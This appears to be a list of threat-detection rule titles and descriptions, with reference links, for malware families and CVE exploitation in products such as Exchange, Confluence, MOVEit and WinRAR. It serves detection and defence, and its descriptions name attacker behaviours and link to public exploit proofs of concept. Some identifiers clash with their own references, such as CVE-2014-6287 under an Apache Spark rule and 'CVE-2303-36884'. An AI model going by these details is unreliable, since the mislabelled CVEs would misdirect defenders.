Detects malicious indicators seen used by the Goofy Guineapig malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential Goofy Guineapig Backdoor Activity |
Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential Goofy Guineapig GoolgeUpdate Process Anomaly |
Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Goofy Guineapig Backdoor Potential C2 Communication |
Detects potential C2 communication related to Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Goofy Guineapig Backdoor Service Creation |
Detects service creation persistence used by the Goofy Guineapig backdoor |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Moriya Rootkit File Created |
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. |
https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 |
Pingback Backdoor File Indicators |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Pingback Backdoor DLL Loading Activity |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Pingback Backdoor Activity |
Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 |
Small Sieve Malware File Indicator Creation |
Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Small Sieve Malware CommandLine Indicator |
Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Small Sieve Malware Potential C2 Communication |
Detects potential C2 communication related to Small Sieve malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Small Sieve Malware Registry Persistence |
Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
HAFNIUM Exchange Exploitation Activity |
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers |
https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3, https://twitter.com/GadixCRK/status/1369313704869834753?s=20, https://twitter.com/BleepinComputer/status/1372218235949617161 |
Exchange Exploitation Used by HAFNIUM |
Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
REvil Kaseya Incident Malware Patterns |
Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) |
https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers, https://www.joesandbox.com/analysis/443736/0/html, https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b, https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/, https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/ |
APT PRIVATELOG Image Load Pattern |
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances |
https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html |
SOURGUM Actor Behaviours |
Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM |
https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection, https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml, https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ |
DEWMODE Webshell Access |
Detects access to DEWMODE webshell as described in FIREEYE report |
https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion |
Potential CVE-2023-21554 QueueJumper Exploitation |
Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) |
https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ |
Potential CVE-2022-21587 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution. |
https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/, https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis, https://github.com/hieuminhnv/CVE-2022-21587-POC, https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ |
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution |
Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
|
https://blog.morphisec.com/vmware-identity-manager-attack-backdoor, https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC |
CVE-2022-24527 Microsoft Connected Cache LPE |
Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache |
https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/ |
Potential CVE-2022-26809 Exploitation Attempt |
Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809, https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html, https://twitter.com/cyb3rops/status/1514217991034097664, https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/ |
Zimbra Collaboration Suite Email Server Unauthenticated RCE |
Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection |
https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/, https://www.yang99.top/index.php/archives/82/, https://github.com/vnhacker1337/CVE-2022-27925-PoC |
Potential CVE-2022-29072 Exploitation Attempt |
Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
The command runs in a child process under the 7zFM.exe process.
|
https://github.com/kagancapar/CVE-2022-29072, https://twitter.com/kagancapar/status/1515219358234161153 |
CVE-2022-31659 VMware Workspace ONE Access RCE |
Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659 |
https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd |
Suspicious Set Value of MSDT in Registry (CVE-2022-30190) |
Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ |
CVE-2022-31656 VMware Workspace ONE Access Auth Bypass |
Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.
A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
|
https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd |
Apache Spark Shell Command Injection - Weblogs |
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective |
https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files |
Atlassian Bitbucket Command Injection Via Archive API |
Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804 |
https://twitter.com/_0xf4n9x_/status/1572052954538192901, https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/, https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html, https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/ |
Potential OWASSRF Exploitation Attempt - Proxy |
Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ |
OWASSRF Exploitation Attempt Using Public POC - Proxy |
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw |
Potential OWASSRF Exploitation Attempt - Webserver |
Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ |
OWASSRF Exploitation Attempt Using Public POC - Webserver |
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint |
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw |
Suspicious Sysmon as Execution Parent |
Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120, https://twitter.com/filip_dragovic/status/1590052248260055041, https://twitter.com/filip_dragovic/status/1590104354727436290 |
Exploitation Indicator Of CVE-2022-42475 |
Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd. |
https://www.fortiguard.com/psirt/FG-IR-22-398, https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/, https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/, https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420 |
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 |
Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877 |
https://seclists.org/fulldisclosure/2023/Jan/1, https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/ |
Potential CVE-2022-46169 Exploitation Attempt |
Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169 |
https://github.com/0xf4n9x/CVE-2022-46169, https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf, https://github.com/rapid7/metasploit-framework/pull/17407 |
MSSQL Extended Stored Procedure Backdoor Maggie |
This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server |
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 |
BlueSky Ransomware Artefacts |
Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt. |
https://unit42.paloaltonetworks.com/bluesky-ransomware/ |
Potential Bumblebee Remote Thread Creation |
Detects remote thread injection events based on action seen used by bumblebee |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
ChromeLoader Malware Execution |
Detects execution of ChromeLoader malware via a registered scheduled task |
https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER, https://twitter.com/th3_protoCOL/status/1480621526764322817, https://twitter.com/Kostastsale/status/1480716528421011458, https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd |
Emotet Loader Execution Via .LNK File |
Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
The ".lnk" file was delivered via phishing campaign.
|
https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338, https://twitter.com/Cryptolaemus1/status/1517634855940632576, https://tria.ge/220422-1pw1pscfdl/, https://tria.ge/220422-1nnmyagdf2/ |
Hermetic Wiper TG Process Patterns |
Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia |
Raspberry Robin Subsequent Execution of Commands |
Detects raspberry robin subsequent execution of commands. |
https://redcanary.com/blog/raspberry-robin/ |
Raspberry Robin Initial Execution From External Drive |
Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". |
https://redcanary.com/blog/raspberry-robin/ |
Serpent Backdoor Payload Execution Via Scheduled Task |
Detects post exploitation execution technique of the Serpent backdoor.
According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
|
https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
Potential Raspberry Robin Dot Ending File |
Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin |
https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ |
Potential ACTINIUM Persistence Activity |
Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. |
https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations |
FakeUpdates/SocGholish Activity |
Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. |
https://twitter.com/th3_protoCOL/status/1536788652889497600, https://twitter.com/1ZRR4H/status/1537501582727778304 |
MERCURY APT Activity |
Detects suspicious command line patterns seen being used by MERCURY APT |
https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ |
MSMQ Corrupted Packet Encountered |
Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation |
https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ |
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 |
Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
|
https://www.tenable.com/security/research/tra-2023-11, https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py, https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal |
Exploitation Indicators Of CVE-2023-20198 |
Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI. |
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z, https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/ |
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) |
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
|
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518 |
Potential CVE-2023-2283 Exploitation |
Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation. |
https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20, https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420, https://nvd.nist.gov/vuln/detail/CVE-2023-2283, https://www.blumira.com/cve-2023-2283/, https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283 |
Outlook Task/Note Reminder Received |
Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. |
https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
CVE-2023-23397 Exploitation Attempt |
Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. |
https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/ |
Potential CVE-2023-23397 Exploitation Attempt - SMB |
Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. |
https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
Potential CVE-2023-23752 Exploitation Attempt |
Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla |
https://xz.aliyun.com/t/12175, https://twitter.com/momika233/status/1626464189261942786 |
Potential CVE-2023-25157 Exploitation Attempt |
Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer |
https://github.com/win3zz/CVE-2023-25157, https://twitter.com/parzel2/status/1665726454489915395, https://github.com/advisories/GHSA-7g5f-wrx8-5ccf |
Potential CVE-2023-25717 Exploitation Attempt |
Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin |
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ |
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader |
Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. |
https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363, https://www.zerodayinitiative.com/advisories/ZDI-23-491/, https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/ |
Potential CVE-2023-27997 Exploitation Indicators |
Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs.
To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
|
https://blog.lexfo.fr/Forensics-xortigate-notice.html, https://blog.lexfo.fr/xortigate-cve-2023-27997.html, https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/, https://labs.watchtowr.com/xortigate-or-cve-2023-27997/ |
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity |
Detects file indicators of potential exploitation of MOVEit CVE-2023-34362. |
https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/, https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/, https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/ |
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE |
Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
Hunting Opportunity
Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
|
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response, https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/ |
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request |
Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362 |
https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft |
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location |
Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation |
Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution |
Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 |
https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ |
Potential CVE-2023-36884 Exploitation Dropped File |
Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit, https://twitter.com/wdormann/status/1679184475677130755, https://twitter.com/r00tbsd/status/1679042071477338114/photo/1 |
Potential CVE-2023-36884 Exploitation Pattern |
Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2303-36884 URL Request Pattern Traffic |
Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - File Downloads |
Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - URL Marker |
Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Potential CVE-2023-36884 Exploitation - Share Access |
Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File |
Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
CVE-2023-40477 Potential Exploitation - .REV File Creation |
Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. |
https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html |
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process |
Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. |
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md |
CVE-2023-40477 Potential Exploitation - WinRAR Application Crash |
Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 |
https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html |
Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy |
Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
|
https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261 |
Potential Information Disclosure CVE-2023-43261 Exploitation - Web |
Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
|
https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261 |
Potential CVE-2023-46214 Exploitation Attempt |
Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
|
